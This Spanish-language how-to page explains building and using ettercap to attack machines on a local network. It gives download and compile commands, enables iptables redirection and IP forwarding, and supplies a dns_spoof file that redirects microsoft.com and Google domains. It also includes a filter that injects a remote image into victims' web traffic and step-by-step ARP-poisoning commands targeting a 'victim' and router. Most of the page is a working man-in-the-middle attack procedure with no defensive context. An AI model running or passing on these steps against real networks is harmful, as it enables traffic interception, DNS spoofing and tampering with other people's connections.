Volver al índice


ettercap

[Dependencias: libcap2 libnet1 zlib1g libpthread-stubs0 libpcre3-dev libpcap-dev libcap-dev libnet6-1.3-0 libnet1-dev libssl-dev ncurses-bin libncurses5-dev libsdl-pango1 libatk1.0-dev]

Snifador de red. Muestra pantallas solicitando aceptación de certificado en los navegadores de las victimas.

descargar de http://ettercap.sourceforge.net/ y descomprimir

$ wget http://prdownloads.sourceforge.net/ettercap/ettercap-NG-0.7.3.tar.gz?download

$ wget http://sourceforge.net/projects/ettercap/files/ettercap/NG-0.7.3/ettercap-NG-0.7.3.tar.gz/download

$ tar -zvxf paquete

$ cd ettercap-NG-0.7.3

$ ./configure

$ make

# make install

$ ettercap -P list (visualizar plugins instalados)

modificar archivo de configuración:

# nano /etc/etter.conf

descomentar la linea:himne20-01-13 19:37Menos información

# if you use iptables:

redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

Y modificar:

# the command used by the remote_browser plugin

remote_browser = "firefox -remote openurl(http://%host%url)"

Para usar el plugin dns_spoof (Redireccionar páginas a otros sitios)

# nano /usr/share/ettercap/etter.dns

# 3 Modos de especificar la redirección a localhost

microsoft.com          A       192.168.1.2

*.microsoft.com        A       192.168.1.2

*google*               A       192.168.1.2

Para la sustitución de imagenes:

# touch test2filter

Pegar:

if (ip.proto == TCP && tcp.src == 80) {

replace("img src=", "img src=\"http://www.irongeek.com/images/jollypwn.png\" ");

replace("IMG SRC=", "img src=\"http://www.irongeek.com/images/jollypwn.png\" ");

msg("Filter ok.\n");

Configurar el sistema para que acepte todos los paquetes que detecte. Si al lanzar:

# cat /proc/sys/net/ipv4/ip_forward

Si la respuesta no es 1, lanzar:

# echo 1 > /proc/sys/net/ipv4/ip_forward

Arrancar la aplicación en ncurses [en terminal -> ettercap -T , en modo gtk -> ettercap -G y en modo demonio -> ettercap -D . En este último caso el análisis se realiza en los archivos de log]:

# ettercap -C

Clicar en:

Sniff -> Unifield sniffing

Y aceptar [o poner] la red [eth0]. En la nueva pantalla, clic en:

Host -> Scan for host

Para escanear la red. Para visionar las máquina activas obtenidas, clic en:

Hosts -> Hosts List

Bajar con el cursor hasta la IP del router y pulsar la tecla "1". Luego nos situamos sobre la IP del objetivo y pulsar la tecla "2" con lo que colocamos nuestra máquina entre el router y la máquina objetivo (envenenamiento arp). Luego en el cuadro que se abre con:

Mitm -> Arp poisoning

Parameters, ponemos:

remote

Y arrancamos el sniffer:

Start -> Start sniffing

Para observar las conexiones que realiza la máquina objetivo:

View -> Connections

Para terminar el ataque:

Mitm -> Stop mitm atack

Start -> Stop Sniffing

Start -> Exit

Forma abreviada:

# ettercap -Tq -M arp:remote -i eth0 ip_victima ip_router

O solo especificando la del router si se ataca toda la red:

# ettercap -Tq -M arp:remote -i eth0 ip_router


Volver al índice